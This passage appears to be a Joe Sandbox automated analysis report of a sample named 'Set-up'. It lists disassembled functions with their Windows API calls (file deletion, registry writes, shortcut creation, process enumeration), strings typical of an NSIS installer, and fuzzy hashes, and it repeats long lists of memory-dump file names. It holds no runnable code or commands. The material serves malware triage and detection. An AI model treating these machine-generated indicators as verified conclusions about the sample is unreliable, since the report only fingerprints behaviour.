Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Process32NextW, xrefs: 004065C8
EnumProcesses, xrefs: 00406482
GetModuleBaseNameW, xrefs: 00406494
CreateToolhelp32Snapshot, xrefs: 004065B5
Process32FirstW, xrefs: 004065BD
EnumProcessModules, xrefs: 0040648A
Kernel32.DLL, xrefs: 0040659B
PSAPI.DLL, xrefs: 00406464
Unknown, xrefs: 004064FC
Module32NextW, xrefs: 004065DE
Module32FirstW, xrefs: 004065D3

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

@%F, xrefs: 004042A7
open, xrefs: 004042DF
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
